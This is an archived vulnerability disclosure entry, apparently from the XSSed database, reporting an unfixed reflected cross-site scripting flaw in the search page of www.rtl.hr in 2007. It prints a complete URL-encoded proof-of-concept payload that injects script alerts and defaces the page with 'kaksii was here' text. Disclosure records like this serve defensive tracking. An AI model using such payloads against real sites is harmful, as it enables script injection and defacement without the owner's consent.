Unfixed XSS vulnerability at www.rtl.hr

2007-02-11T00:00:00
ID XSSED:24689
Type xssed
Reporter kaksii
Modified 2007-05-11T00:00:00

Description

Security researcher kaksii, has submitted on 02/11/2007 a cross-site-scripting (XSS) vulnerability affecting www.rtl.hr, which at the time of submission ranked 5042 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.rtl.hr/pretrazivanje/?submit=1&search_string=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&1=kaksii+was+here